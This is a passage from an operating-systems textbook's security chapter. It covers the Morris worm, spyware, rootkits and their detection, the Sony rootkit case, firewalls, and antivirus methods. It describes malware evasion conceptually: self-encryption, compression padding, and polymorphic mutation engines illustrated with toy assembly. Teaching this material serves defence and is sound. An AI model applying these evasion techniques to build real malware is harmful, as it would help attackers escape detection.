run rsh without any further authentication. If this worked, the remote shell upload-
ed the worm program and continued infecting new machines from there.
Method 2 made use of a program present on all UNIX systems called finger
that allows a user anywhere on the Internet to type
finger name@site
to display information about a person at a particular installation. This information
usually includes the person's real name, login, home and work addresses and tele-
phone numbers, secretary's name and telephone number, FAX number, and similar
information. It is the electronic equivalent of the phone book.
Finger works as follows.  On every UNIX machine a background process call-
ed the finger daemon, runs all the time fielding and answering queries from all
over the Internet. What the worm did was call finger with a specially handcrafted
536-byte string as parameter. This long string overflowed the daemon's buffer and
overwrote its stack, the way shown in Fig. 9-21(c). The bug exploited here was the
daemon's failure to check for overflow. When the daemon returned from the proce-
dure it was in at the time it got the request, it returned not to main, but to a proce-
dure inside the 536-byte string on the stack. This procedure tried to execute sh.        If
it worked, the worm now had a shell running on the machine under attack.
Method 3 depended on a bug in the mail system, sendmail, which allowed the
worm to mail a copy of the bootstrap and get it executed.
Once established, the worm tried to break user passwords. Morris did not have
to do much research on how to accomplish this.        All he had to do was ask his
father, a security expert at the National Security Agency, the U.S. government's
code-breaking agency, for a reprint of a classic paper on the subject that Morris Sr.
and Ken Thompson had written a decade earlier at Bell Labs (Morris and Thomp-
son, 1979).  Each broken password allowed the worm to log in on any machines
the password's owner had accounts on.
Every time the worm gained access to a new machine, it first checked to see if
any other copies of the worm were already active there. If so, the new copy exited,
except one time in seven it kept going, possibly in an attempt to keep the worm



676                                  SECURITY                                   CHAP. 9
propagating even if the system administrator there started up his own version of the
worm to fool the real worm. The use of one in seven created far too many worms,
and was the reason all the infected machines ground to a halt: they were infested
with worms.   If Morris had left this out and just exited whenever another worm
was sighted (or made it one in 50) the worm would probably have gone undetected.
     Morris was caught when one of his friends spoke with the New York Times sci-
ence reporter, John Markoff, and tried to convince Markoff that the incident was an
accident, the worm was harmless, and the author was sorry. The friend inadver-
tently let slip that the perpetrator's login was rtm.       Converting rtm into the owner's
name was easy--all that Markoff had to do was to run finger.     The next day the
story was the lead on page one, even upstaging the presidential election three days
later.
     Morris was tried and convicted in federal court.       He was sentenced to a fine of
$10,000, 3 years probation, and 400 hours of community service. His legal costs
probably exceeded $150,000. This sentence generated a great deal of controversy.
Many in the computer community felt that he was a bright graduate student whose
harmless prank had gotten out of control. Nothing in the worm suggested that Mor-
ris was trying to steal or damage anything. Others felt he was a serious criminal
and should have gone to jail.  Morris later got his Ph.D. from Harvard and is now a
professor at M.I.T.
     One    permanent  effect  of    this  incident    was  the  establishment  of  CERT
(the Computer Emergency Response Team), which provides a central place to
report break-in attempts, and a group of experts to analyze security problems and
design fixes. While this action was certainly a step forward, it also has its down-
side.   CERT collects information about system flaws that can be attacked and how
to fix them.  Of necessity, it circulates this information widely to thousands of sys-
tem administrators on the Internet. Unfortunately, the bad guys (possibly posing as
system administrators) may also be able to get bug reports and exploit the loop-
holes in the hours (or even days) before they are closed.
     A variety of other worms have been released since the Morris worm. They op-
erate along the same lines as the Morris worm, only exploiting different bugs in
other software. They tend to spread much faster than viruses because they move on
their own.
9.9.4 Spyware
     An increasingly common kind of malware is spyware, Roughly speaking, spy-
ware is software that is surrepitiously loaded onto a PC without the owner's know-
ledge and runs in the background doing things behind the owner's back. Defining
it, though, is surprisingly tricky.  For example, Windows Update automatically
downloads security patches to Windows without the owners being aware of it. Sim-
ilarly, many antivirus programs automatically update themselves silently in the



SEC. 9.9                                MALWARE                                                   677
background. Neither of these are considered spyware. If Potter Stewart were alive,
he would probably say: ``I can't define spyware, but I know it when I see it.''
     Others have tried harder to define it (spyware, not pornography).           Barwinski et
al. (2006) have said it has four characteristics. First, it hides, so the victim cannot
find it easily.  Second, it collects data about the user (Websites visited, passwords,
even credit card numbers).    Third, it communicates the collected information back
to its distant master. And fourth, it tries to survive determined attempts to remove
it.  Additionally, some spyware changes settings and performs other malicious and
annoying activities as described below.
     Barwinsky et al. divided the spyware into three broad categories. The first is
marketing: the spyware simply collects information and sends it back to the master,
usually to better target advertising to specific machines. The second category is
surveillance, where companies intentionally put spyware on employee machines to
keep track of what they are doing and which Websites they are visiting. The third
gets close to classical malware, where the infected machine becomes part of a
zombie army waiting for its master to give it marching orders.
     They ran an experiment to see what kinds of Websites contain spyware by vis-
iting 5000 Websites. They observed that the major purveyors of spyware are Web-
sites relating to adult entertainment, warez, online travel, and real estate.
     A much larger study was done at the University of Washington (Moshchuk et
al., 2006). In the UW study, some 18 million URLs were inspected and almost 6%
were  found      to  contain  spyware.  Thus  it  is  not  surprising  that  in  a  study               by
AOL/NCSA that they cite, 80% of the home computers inspected were infested by
spyware, with an average of 93 pieces of spyware per computer. The UW study
found that the adult, celebrity, and wallpaper sites had the largest infection rates,
but they did not examine travel and real estate.
How Spyware Spreads
     The obvious next question is: ``How does a computer get infected with spy-
ware?'' One way is the same as with any malware: via a Trojan horse.                A consid-
erable amount of free software contains spyware, with the author of the software
making money from the spyware. Peer-to-peer file-sharing software (e.g., Kazaa)
is rampant with spyware. Also, many Websites display banner ads that direct
surfers to spyware-infested Web pages.
     The other major infection route is often called the drive-by download.                       It is
possible to pick up spyware (in fact, any malware) just by visiting an infected Web
page. There are three variants of the infection technology. First, the Web page may
redirect the browser to an executable (.exe) file. When the browser sees the file, it
pops up a dialog box asking the user if he wants to run or save the program. Since
legitimate downloads use the same mechanism, most users just click on RUN,
 Stewart was a justice on the U.S. Supreme Court who once wrote an opinion on a pornography case
in which he admitted to being unable to define pornography but added: ``but I know it when I see it.''



678                                    SECURITY                           CHAP. 9
which causes the browser to download and execute the software.           At this point, the
machine is infected and the spyware is free to do anything it wants to.
     The second common route is the infected toolbar. Both Internet Explorer and
Firefox support third-party toolbars.  Some spyware writers create a nice toolbar
that has some useful features and then widely advertise it as a great free add-on.
People who install the toolbar get the spyware. The popular Alexa toolbar contains
spyware, for example. In essence, this scheme is a Trojan horse, just packaged dif-
ferently.
     The third infection variant is more devious. Many Web pages use a Microsoft
technology called activeX controls.    These controls are x86 binary programs that
plug into Internet Explorer and extend its functionality, for example, rendering spe-
cial kinds of image, audio, or video Web pages.  In principle, this technology is
legitimate.  In practice, it is dangerous. This approach always targets IE (Internet
Explorer), never Firefox, Chrome, Safari, or other browsers.
     When a page with an activeX control is visited, what happens depends on the
IE security settings. If they are set too low, the spyware is automatically download-
ed and installed. The reason people set the security settings low is that when they
are set high, many Websites do not display correctly (or at all) or IE is constantly
asking permission for this and that, none of which the user understands.
     Now suppose the user has the security settings fairly high. When an infected
Web page is visited, IE detects the activeX control and pops up a dialog box that
contains a message provided by the Web page. It might say
Do you want to install and run a program that will speed up your Internet access?
Most people will think this is a good idea and click YES.     Bingo. They're history.
Sophisticated users may check out the rest of the dialog box, where they will find
two other items. One is a link to the Web page's certificate (as discussed in Sec.
9.5) provided by some CA they have never heard of and which contains no useful
information other than the fact that CA vouches that the company exists and had
enough money to pay for the certificate. The other is a hyperlink to a different Web
page provided by the Web page being visited.     It is supposed to explain what the
activeX control does, but, in fact, it can be about anything and generally explains
how wonderful the activeX control is and how it will improve your surfing experi-
ence. Armed with this bogus information, even sophisticated users often click
YES.
     If they click NO, often a script on the Web page uses a bug in IE to try to
download the spyware anyway. If no bug is available to exploit, it may just try to
download the activeX control again and again and again, each time causing IE to
display the same dialog box. Most people do not know what to do at that point (go
to the task manager and kill IE) so they eventually give up and click YES. See
Bingo above.
     Often what happens next is that the spyware displays a 2030 page license
agreement written in language that would have been familiar to Geoffrey Chaucer



SEC. 9.9                              MALWARE                                          679
but not to anyone subsequent to him outside the legal profession. Once the user has
accepted the license, he may lose his right to sue the spyware vendor because he
has just agreed to let the spyware run amok, although sometimes local laws over-
ride such licenses. (If the license says ``Licensee hereby irrevocably grants to
licensor the right to kill licensee's mother and claim her inheritance'' licensor may
have  some  trouble  convincing       the  courts  when  he  comes   to  collect,  despite
licensee's agreeing to the license.)
Actions Taken by Spyware
Now let us look at what spyware typically does. All of the items in the list
below are common.
      1.  Change the browser's home page.
      2.  Modify the browser's list of favorite (bookmarked) pages.
      3.  Add new toolbars to the browser.
      4.  Change the user's default media player.
      5.  Change the user's default search engine.
      6.  Add new icons to the Windows desktop.
      7.  Replace banner ads on Web pages with those the spyware picks.
      8.  Put ads in the standard Windows dialog boxes.
      9.  Generate a continuous and unstoppable stream of pop-up ads.
The first three items change the browser's behavior, usually in such a way that even
rebooting the system does not restore the previous values. This attack is known as
mild browser hijacking (mild, because there are even worse hijacks).               The two
items change settings in the Windows registry, diverting the unsuspecting user to a
different media player (that displays the ads the spyware wants displayed) and a
different search engine (that returns Websites the spyware wants it to).           Adding
icons to the desktop is an obvious attempt to get the user to run newly installed
software. Replacing banner ads (468  60 .gif images) on subsequent Web pages
makes it look like all Web pages visited are advertising the sites the spyware
chooses. But it is the last item that is the most annoying: a pop-up ad that can be
closed, but which generates another pop-up ad immediately ad infinitum with no
way to stop them. Additionally, spyware sometimes disables the firewall, removes
competing spyware, and carries out other malicious actions.
Many spyware programs come with uninstallers, but they rarely work, so inex-
perienced users have no way to remove the spyware. Fortunately, a new industry of
antispyware software is being created and existing antivirus firms are getting into
the act as well. Still the line between legitimate programs and spyware is blurry.



680                                 SECURITY                             CHAP. 9
     Spyware should not be confused with adware, in which legitimate (but small)
software vendors offer two versions of their product: a free one with ads and a paid
one without ads. These companies are very clear about the existence of the two
versions and always offer users the option to upgrade to the paid version to get rid
of the ads.
9.9.5 Rootkits
     A rootkit is a program or set of programs and files that attempts to conceal its
existence, even in the face of determined efforts by the owner of the infected ma-
chine to locate and remove it. Usually, the rootkit contains some malware that is
being hidden as well.     Rootkits can be installed by any of the methods discussed so
far, including viruses, worms, and spyware, as well as by other ways, one of which
will be discussed later.
Types of Rootkits
     Let us now discuss the five kinds of rootkits that are currently possible, from
bottom to top. In all cases, the issue is: where does the rootkit hide?
     1.  Firmware rootkits.    In theory at least, a rootkit could hide by re-
         flashing the BIOS with a copy of itself in there. Such a rootkit would
         get control whenever the machine was booted and also whenever a
         BIOS function was called. If the rootkit encrypted itself after each use
         and decrypted itself before each use, it would be quite hard to detect.
         This type has not been observed in the wild yet.
     2.  Hypervisor rootkits.       An extremely sneaky kind of rootkit could run
         the entire operating system and all the applications in a virtual ma-
         chine under its control. The first proof-of-concept, blue pill (a refer-
         ence to a movie called The Matrix), was demonstrated by a Polish
         hacker named Joanna Rutkowska in 2006. This kind of rootkit usual-
         ly modifies the boot sequence so that when the machine is powered
         on it executes the hypervisor on the bare hardware, which then starts
         the operating system and its applications in a virtual machine. The
         strength of this method, like the previous one, is that nothing is hid-
         den in the operating system, libraries, or programs, so rootkit detec-
         tors that look there will come up short.
     3.  Kernel rootkits.  The most common kind of rootkit at present is one
         that infects the operating system and hides in it as a device driver or
         loadable kernel module. The rootkit can easily replace a large, com-
         plex, and frequently changing driver with a new one that contains the
         old one plus the rootkit.



SEC. 9.9                             MALWARE                                            681
4.        Library rootkits.       Another place a rootkit can hide is in the system
          library, for example, in libc in Linux. This location gives the malware
          the opportunity to inspect the arguments and return values of system
          calls, modifying them as need be to keep itself hidden.
5.        Application rootkits. Another place to hide a rootkit is inside a large
          application program, especially one that creates many new files while
          running (user profiles, image previews, etc.).         These new files are
          good places to hide things, and no one thinks it strange that they exist.
The five places rootkits can hide are illustrated in Fig. 9-31.
                       Library       Library
             Library         App.                    Library          Library
                App.                 App.                 App.        App.
                       Operating
          Operating    system        Operating       Operating        Operating
          system       Hypervisor    system          system           system
          HW           HW (BIOS)     HW (BIOS)       HW (BIOS)        HW (BIOS)
              (a)            (b)     (c)                  (d)         (e)
                       Figure 9-31.  Five places a rootkit can hide.
Rootkit Detection
Rootkits are hard to detect when the hardware, operating system, libraries, and
applications cannot be trusted. For example, an obvious way to look for a rootkit is
to make listings of all the files on the disk. However, the system call that reads a
directory, the library procedure that calls this system call, and the program that
does the listing are all potentially malicious and might censor the results, omitting
any files relating to the rootkit. Nevertheless, the situation is not hopeless, as de-
scribed below.
Detecting a rootkit that boots its own hypervisor and then runs the operating
system and all applications in a virtual machine under its control is tricky, but not
impossible.   It requires carefully looking for minor discrepancies in performance
and functionality between a virtual machine and a real one. Garfinkel et al. (2007)
have suggested several of them, as described below.       Carpenter et al. (2007) also
discuss this subject.
One whole class of detection methods relies on the fact that hypervisor itself
uses physical resources and the loss of these resources can be detected. For ex-
ample, the hypervisor itself needs to use some TLB entries, competing with the
virtual machine for these scarce resources. A detection program could put pressure



682                             SECURITY                            CHAP. 9
on the TLB, observe the performance, and compare it to previously measured per-
formance on the bare hardware.
     Another class of detection methods relates to timing, especially of virtualized
I/O devices. Suppose that it takes 100 clock cycles to read out some PCI device
register on the real machine and this time is highly reproducible. In a virtual envi-
ronment, the value of this register comes from memory, and its read time depends
on whether it is in the CPU's level 1 cache, level 2 cache, or actual RAM. A detec-
tion program could easily force it to move back and forth between these states and
measure the variability in read times. Note that it is the variability that matters, not
the read time.
     Another area that can be probed is the time it takes to execute privileged in-
structions, especially those that require only a few clock cycles on the real hard-
ware and hundreds or thousands of clock cycles when they must be emulated. For
example, if reading out some protected CPU register takes 1 nsec on the real hard-
ware, there is no way a billion traps and emulations can be done in 1 sec.                Of
course, the hypervisor can cheat by reporting emulated time instead of real time on
all system calls involving time. The detector can bypass the emulated time by con-
necting to a remote machine or Website that provides an accurate time base. Since
the detector just needs to measure time intervals (e.g., how long it takes to execute
a billion reads of a protected register), skew between the local clock and the remote
clock does not matter.
     If no hypervisor has been slipped between the hardware and the operating sys-
tem, then the rootkit might be hiding inside the operating system.  It is difficult to
detect it by booting the computer since the operating system cannot be trusted. For
example, the rootkit might install a large number of files, all of whose names begin
with ``$$$ '' and when reading directories on behalf of user programs, never report
the existence of such files.
     One way to detect rootkits under these circumstances is to boot the computer
from a trusted external medium such as the original DVD or USB stick. Then the
disk can be scanned by an antirootkit program without fear that the rootkit itself
will interfere with the scan. Alternatively, a cryptographic hash can be made of
each file in the operating system and these compared to a list made when the sys-
tem was installed and stored outside the system where it could not be tampered
with. Alternatively, if no such hashes were made originally, they can be computed
from the installation USB or CD-ROM/DVD now, or the files themselves just com-
pared.
     Rootkits in libraries and application programs are harder to hide, but if the op-
erating system has been loaded from an external medium and can be trusted, their
hashes can also be compared to hashes known to be good and stored on a USB or
CD-ROM.
     So far, the discussion has been about passive rootkits, which do not interfere
with the rootkit-detection software. There are also active rootkits, which search out
and destroy the rootkit detection software, or at least modify it to always announce:



SEC. 9.9                           MALWARE                                                 683
``NO ROOTKITS FOUND!'' These require more complicated measures, but fortu-
nately no active rootkits have appeared in the wild yet.
There are two schools of thought about what to do after a rootkit has been
discovered. One school says the system administrator should behave like a surgeon
treating a cancer: cut it out very carefully. The other says trying to remove the
rootkit is too dangerous.    There may be pieces still hidden away.  In this view, the
only solution is to revert to the last complete backup known to be clean.  If no
backup is available, a fresh install is required.
The Sony Rootkit
In 2005, Sony BMG released a number of audio CDs containing a rootkit.                     It
was discovered by Mark Russinovich (cofounder of the Windows admin tools
Website www.sysinternals.com), who was then working on developing a rootkit
detector and was most surprised to find a rootkit on his own system.       He wrote
about it on his blog and soon the story was all over the Internet and the mass
media. Scientific papers were written about it (Arnab and Hutchison, 2006; Bishop
and Frincke, 2006; Felten and Halderman, 2006; Halderman and Felten, 2006; and
Levine et al., 2006).  It took years for the resulting furor to die down. Below we
will give a quick description of what happened.
When a user inserts a CD in the drive on a Windows computer, Windows looks
for a file called autorun.inf, which contains a list of actions to take, usually starting
some program on the CD (such as an installation wizard). Normally, audio CDs do
not have these files since stand-alone CD players ignore them if present. Appar-
ently some genius at Sony thought that he would cleverly stop music piracy by put-
ting an autorun.inf file on some of its CDs, which when inserted into a computer
immediately and silently installed a 12-MB rootkit. Then a license agreement was
displayed, which did not mention anything about software being installed. While
the license was being displayed, Sony's software checked to see if any of 200
known copy programs were running, and if so commanded the user to stop them.
If the user agreed to the license and stopped all copy programs, the music would
play; otherwise it would not. Even in the event the user declined the license, the
rootkit remained installed.
The rootkit worked as follows.     It inserted into the Windows kernel a number
of files whose names began with $sys$.  One of these was a filter that intercepted
all system calls to the CD-ROM drive and prohibited all programs except Sony's
music player from reading the CD.  This action made copying the CD to the hard
disk (which is legal) impossible. Another filter intercepted all calls that read file,
process, and registry listings and deleted all entries starting with $sys$ (even from
programs completely unrelated to Sony and music) in order to cloak the rootkit.
This approach is fairly standard for newbie rootkit designers.
Before Russinovich discovered the rootkit, it had already been installed widely,
not entirely surprising since it was on over 20 million CDs.    Dan Kaminsky (2006)



684                                     SECURITY                                CHAP. 9
studied the extent and discovered that computers on over 500,000 networks world-
wide had been infected by the rootkit.
     When the news broke, Sony's initial reaction was that it had every right to pro-
tect its intellectual property.  In an interview on National Public Radio, Thomas
Hesse, the president of Sony BMG's global digital business, said: ``Most people, I
think, don't even know what a rootkit is, so why should they care about it?'' When
this response itself provoked a firestorm, Sony backtracked and released a patch
that removed the cloaking of $sys$ files but kept the rootkit in place. Under
increasing pressure, Sony eventually released an uninstaller on its Website, but to
get it, users had to provide an email address, and agree that Sony could send them
promotional material in the future (what most people call spam).
     As the story continued to play out, it emerged that Sony's uninstaller contained
technical flaws that made the infected computer highly vulnerable to attacks over
the Internet.  It was also revealed that the rootkit contained code from open source
projects in violation of their copyrights (which permitted free use of the software
provided that the source code is released).
     In addition to an unparalleled public relations disaster, Sony faced legal jeop-
ardy, too. The state of Texas sued Sony for violating its antispyware law as well as
for violating its deceptive trade practices law (because the rootkit was installed
even if the license was declined). Class-action suits were later filed in 39 states. In
December 2006, these suits were settled when Sony agreed to pay $4.25 million, to
stop including the rootkit on future CDs, and to give each victim the right to down-
load three albums from a limited music catalog.   On January 2007, Sony admitted
that its software also secretly monitored users' listening habits and reported them
back to Sony, in violation of U.S. law.  In a settlement with the FTC, Sony agreed
to pay people whose computers were damaged by its software $150.
     The Sony rootkit story has been provided for the benefit of any readers who
might have been thinking that rootkits are an academic curiosity with no real-world
implications.  An Internet search for ``Sony rootkit'' will turn up a wealth of addi-
tional information.
9.10 DEFENSES
     With  problems  lurking     everywhere,  is  there  any  hope  of  making  systems
secure?    Actually, there is, and in the following sections we will look at some of
the ways systems can be designed and implemented to increase their security. One
of the most important concepts is defense in depth. Basically, the idea here is that
you should have multiple layers of security so that if one of them is breached, there
are still others to overcome. Think about a house with a high, spiky, locked iron
fence around it, motion detectors in the yard, two industrial-strength locks on the
front door, and a computerized burglar alarm system inside. While each technique
is valuable by itself, to rob the house the burglar would have to defeat all of them.



SEC. 9.10                                  DEFENSES                                      685
Properly secured computer systems are like this house, with multiple layers of se-
curity.  We will now look at some of the layers.     The defenses are not really hierar-
chical, but we will start roughly with the more general outer ones and work our
way to more specific ones.
9.10.1 Firewalls
The ability to connect any computer, anywhere, to any other computer, any-
where, is a mixed blessing. While there is a lot of valuable material on the Web,
being connected to the Internet exposes a computer to two kinds of dangers: in-
coming and outgoing. Incoming dangers include crackers trying to enter the com-
puter as well as viruses, spyware, and other malware. Outgoing dangers include
confidential information such as credit card numbers, passwords, tax returns, and
all kinds of corporate information getting out.
Consequently, mechanisms are needed to keep ``good'' bits in and ``bad'' bits
out. One approach is to use a firewall, which is just a modern adaptation of that
old medieval security standby: digging a deep moat around your castle. This design
forced everyone entering or leaving the castle to pass over a single drawbridge,
where they could be inspected by the I/O police. With networks, the same trick is
possible: a company can have many LANs connected in arbitrary ways, but all traf-
fic to or from the company is forced through an electronic drawbridge, the firewall.
Firewalls come in two basic varieties: hardware and software. Companies with
LANs to protect usually opt for hardware firewalls; individuals at home frequently
choose software firewalls. Let us look at hardware firewalls first.  A generic hard-
ware firewall is illustrated in Fig. 9-32. Here the connection (cable or optical fiber)
from the network provider is plugged into the firewall, which is connected to the
LAN.     No packets can enter or exit the LAN without being approved by the fire-
wall. In practice, firewalls are often combined with routers, network address trans-
lation boxes, intrusion detection systems, and other things, but our focus here will
be on the firewall functionality.
                           207.68.160.190:80     207.68.160.191:25  207.68.160.192:21
           Firewall                Web               Email           FTP
                                   server            server          server
         Network
         connection                        Local area network
         Figure 9-32. A simplified view of a hardware firewall protecting a LAN with
         three computers.
Firewalls are configured with rules describing what is allowed in and what is
allowed out. The owner of the firewall can change the rules, commonly via a Web



686                            SECURITY                                    CHAP. 9
interface (most firewalls have a mini-Web server built in to allow this).  In the sim-
plest kind of firewall, the stateless firewall, the header of each packet passing
through is inspected and a decision is made to pass or discard the packet based
solely on the information in the header and the firewall's rules. The information in
the packet header includes the source and destination IP addresses, source and
destination ports, type of service and protocol. Other fields are available, but rarely
occur in the rules.
     In the example of Fig. 9-32 we see three servers, each with a unique IP address
of the form 207.68.160.x, where x is 190, 191, and 192, respectively. These are the
addresses to which packets must be sent to get to these servers.    Incoming packets
also contain a 16-bit port number, which specifies which process on the machine
gets the packet (a process can listen on a port for incoming traffic).     Some ports
have standard services associated with them.  In particular, port 80 is used for the
Web, port 25 is used for email, and port 21 is used for FTP (file transfer) service,
but most of the others are available for user-defined services. Under these condi-
tions, the firewall might be configured as follows:
     IP address          Port  Action
     207.68.160.190      80    Accept
     207.68.160.191      25    Accept
     207.68.160.192      21    Accept
     *                   *     Deny
These rules allow packets to go to machine 207.68.160.190, but only if they are ad-
dressed to port 80; all other ports on this machine are disallowed and packets sent
to them will be silently discarded by the firewall. Similarly, packets can go to the
other two servers if addressed to ports 25 and 21, respectively. All other traffic is
discarded.  This ruleset makes it hard for an attacker to get any access to the LAN
except for the three public services being offered.
     Despite the firewall, it is still possible to attack the LAN.  For example, if the
Web server is apache and the cracker has discovered a bug in apache that can be
exploited, he might be able to send a very long URL to 207.68.160.190 on port 80
and force a buffer overflow, thus taking over one of the machines inside the fire-
wall, which could then be used to launch an attack on other machines on the LAN.
     Another potential attack is to write and publish a multiplayer game and get it
widely accepted. The game software needs some port to connect to other players,
so the game designer may select one, say, 9876, and tell the players to change their
firewall settings to allow incoming and outgoing traffic on this port. People who
have opened this port are now subject to attacks on it, which may be easy especial-
ly if the game contains a Trojan horse that accepts certain commands from afar and
just runs them blindly. But even if the game is legitimate, it might contain poten-
ially exploitable bugs.  The more ports are open, the greater the chance of an attack
succeeding. Every hole increases the odds of an attack getting through.



SEC. 9.10                                DEFENSES                                        687
      In addition to stateless firewalls, there are also stateful firewalls, which keep
track of connections and what state they are in. These firewalls are better at defeat-
ing certain kinds of attacks, especially those relating to establishing connections.
Yet other kinds of firewalls implement an IDS (Intrusion Detection System), in
which the firewall inspects not only the packet headers, but also the packet con-
tents, looking for suspicious material.
      Software firewalls, sometimes called personal firewalls, do the same thing as
hardware firewalls, but in software. They are filters that attach to the network code
inside the operating system kernel and filter packets the same way the hardware
firewall does.
9.10.2 Antivirus and Anti-Antivirus Techniques
      Firewalls try to keep intruders out of the computer, but they can fail in various
ways, as described above.   In that case, the next line of defense comprises the anti-
malware programs, often called antivirus programs, although many of them also
combat worms and spyware. Viruses try to hide and users try to find them, which
leads to a cat-and-mouse game. In this respect, viruses are like rootkits, except that
most virus writers emphasize rapid spread of the virus rather than playing hide-
and-seek down in the weeds as rootkits do. Let us now look at some of the techni-
ques used by antivirus software and also how Virgil the virus writer responds to
them.
Virus Scanners
      Clearly, the average garden-variety user is not going to find many viruses that
do their best to hide, so a market has developed for antivirus software. Below we
will discuss how this software works. Antivirus software companies have laborato-
ries  in  which  dedicated  scientists   work  long  hours  tracking  down  and  under-
standing new viruses. The first step is to have the virus infect a program that does
nothing, often called a goat file, to get a copy of the virus in its purest form. The
next step is to make an exact listing of the virus' code and enter it into the database
of known viruses. Companies compete on the size of their databases.         Inventing
new viruses just to pump up your database is not considered sporting.
      Once an antivirus program is installed on a customer's machine, the first thing
it does is scan every executable file on the disk looking for any of the viruses in the
database of known viruses. Most antivirus companies have a Website from which
customers can download the descriptions of newly discovered viruses into their
databases.  If the user has 10,000 files and the database has 10,000 viruses, some
clever programming is needed to make it go fast, of course.
      Since minor variants of known viruses pop up all the time, a fuzzy search is
needed, to ensure that a 3-byte change to a virus does not let it escape detection.
However, fuzzy searches are not only slower than exact searches, but they may turn



688                                  SECURITY                        CHAP. 9
up false alarms (false positives), that is, warnings about legitimate files that just
happen to contain some code vaguely similar to a virus reported in Pakistan 7 years
ago. What is the user supposed to do with the message:
     WARNING! File xyz.exe may contain the lahore-9x virus. Delete?
The more viruses in the database and the broader the criteria for declaring a hit, the
more false alarms there will be.     If there are too many, the user will give up in dis-
gust. But if the virus scanner insists on a very close match, it may miss some mod-
ified viruses. Getting it right is a delicate heuristic balance.     Ideally, the lab should
try to identify some core code in the virus that is not likely to change and use this
as the virus signature to scan for.
     Just because the disk was declared virus free last week does not mean that it
still is, so the virus scanner has to be run frequently. Because scanning is slow, it is
more efficient to check only those files that have been changed since the date of the
last scan. The trouble is, a clever virus will reset the date of an infected file to its
original date to avoid detection. The antivirus program's response to that is to
check the date the enclosing directory was last changed. The virus' response to that
is to reset the directory's date as well.    This is the start of the cat-and-mouse game
alluded to above.
     Another way for the antivirus program to detect file infection is to record and
store on the disk the lengths of all files.  If a file has grown since the last check, it
might be infected, as shown in Fig. 9-33(ab).         However, a really clever virus can
avoid detection by compressing the program and padding out the file to its original
length to try to blend in.  To make this scheme work, the virus must contain both
compression and decompression procedures, as shown in Fig. 9-33(c).           Another
way for the virus to try to escape detection is to make sure its representation on the
disk does not look like its representation in the antivirus software's database. One
way to achieve this goal is to encrypt itself with a different key for each file infect-
ed. Before making a new copy, the virus generates a random 32-bit encryption key,
for example by XORing the current time of day with the contents of, for example,
memory words 72,008 and 319,992.           It then XORs its code with this key, word by
word, to produce the encrypted virus stored in the infected file, as illustrated in
Fig. 9-33(d).  The key is stored in the file. For secrecy purposes, putting the key in
the file is not ideal, but the goal here is to foil the virus scanner, not prevent the
dedicated scientists at the antivirus lab from reverse engineering the code.              Of
course, to run, the virus has to first decrypt itself, so it needs a decrypting function
in the file as well.
     This scheme is still not perfect because the compression, decompression, en-
cryption, and decryption procedures are the same in all copies, so the antivirus pro-
gram can just use them as the virus signature to scan for. Hiding the compression,
decompression, and encryption procedures is easy: they are just encrypted along
with the rest of the virus, as shown in Fig. 9-33(e).  The decryption code cannot be
encrypted, however.   It has to actually execute on the hardware to decrypt the rest



SEC. 9.10                                DEFENSES                                              689
                    File is longer
                    Virus           Original size      Original size       Original size
                                    Unused             Encrypted           Encrypted
                                                          Virus            Virus
                                                       Decompressor        Decompressor   Encrypted
                                                       Compressor          Compressor
                                    Virus              Encryptor           Encryptor
Executable          Executable      Decompressor          Key              Key
      program       program         Compressor         Decryptor           Decryptor
                                    Compressed         Compressed          Compressed
                                    executable         executable          executable
                                    program            program             program
      Header        Header          Header             Header              Header
      (a)             (b)           (c)                   (d)              (e)
      Figure 9-33. (a) A program. (b) An infected program. (c) A compressed infected
      program.      (d) An encrypted virus. (e) A compressed virus with encrypted com-
      pression code.
of the virus, so it must be present in plaintext. Antivirus programs know this, so
they hunt for the decryption procedure.
      However, Virgil enjoys having the last word, so he proceeds as follows. Sup-
pose that the decryption procedure needs to perform the calculation
      X = (A + B + C - 4)
The straightforward assembly code for this calculation for a generic two-address
computer is shown in Fig. 9-34(a).           The first address is the source; the second is
the destination, so MOV A,R1 moves the variable A to the register R1.                     The code in
Fig. 9-34(b) does the same thing, only less efficiently due to the NOP (no opera-
tion) instructions interspersed with the real code.
      But we are not done yet.      It is also possible to disguise the decryption code.
There are many ways to represent NOP. For example, adding 0 to a register, ORing
it with itself, shifting it left 0 bits, and jumping to the next instruction all do noth-
ing.  Thus     the  program     of  Fig. 9-34(c)   is  functionally   the  same       as  the  one   of
Fig. 9-34(a).       When   copying  itself,  the   virus  could       use  Fig. 9-34(c)   instead    of
Fig. 9-34(a) and still work later when executed.          A virus that mutates on each copy
is called a polymorphic virus.
      Now suppose that R5 is not needed for anything during the execution of this
piece of the code. Then Fig. 9-34(d) is also equivalent to Fig. 9-34(a).                  Finally, in
many cases it is possible to swap instructions without changing what the program
does, so we end up with Fig. 9-34(e) as another code fragment that is logically e-
quivalent to Fig. 9-34(a).          A piece of code that can mutate a sequence of machine



690                            SECURITY                                        CHAP. 9
MOV A,R1         MOV A,R1      MOV A,R1          MOV A,R1                    MOV A,R1
ADD B,R1         NOP           ADD #0,R1         OR R1,R1                    TST R1
ADD C,R1         ADD B,R1      ADD B,R1          ADD B,R1                    ADD C,R1
SUB #4,R1        NOP           OR R1,R1          MOV R1,R5                   MOV R1,R5
MOV R1,X         ADD C,R1      ADD C,R1          ADD C,R1                    ADD B,R1
                 NOP           SHL #0,R1         SHL R1,0                    CMP R2,R5
                 SUB #4,R1     SUB #4,R1         SUB #4,R1                   SUB #4,R1
                 NOP           JMP .+1           ADD R5,R5                   JMP .+1
                 MOV R1,X      MOV R1,X          MOV R1,X                    MOV R1,X
                                                 MOV R5,Y                    MOV R5,Y
(a)              (b)           (c)                         (d)               (e)
                 Figure 9-34.  Examples of a polymorphic virus.
instructions without changing its functionality is called a mutation engine, and
sophisticated viruses contain them to mutate the decryptor from copy to copy.
Mutations can consist of inserting useless but harmless code, permuting instruc-
tions, swapping registers, and replacing an instruction with an equivalent one. The
mutation engine itself can be hidden by encrypting it along with the payload.
     Asking the poor antivirus software to understand that Fig. 9-34(a) through
Fig. 9-34(e) are all functionally equivalent is asking a lot, especially if the mutation
engine has many tricks up its sleeve. The antivirus software can analyze the code to
see what it does, and it can even try to simulate the operation of the code, but
remember it may have thousands of viruses and thousands of files to analyze, so it
does not have much time per test or it will run horribly slowly.
     As an aside, the store into the variable Y was thrown in just to make it harder to
detect the fact that the code related to R5 is dead code, that is, does not do any-
thing. If other code fragments read and write Y, the code will look perfectly legiti-
mate.  A well-written mutation engine that generates good polymorphic code can
give antivirus software writers nightmares. The only bright side is that such an
engine is hard to write, so Virgil's friends all use his code, which means there are
not so many different ones in circulation--yet.
     So far we have talked about just trying to recognize viruses in infected ex-
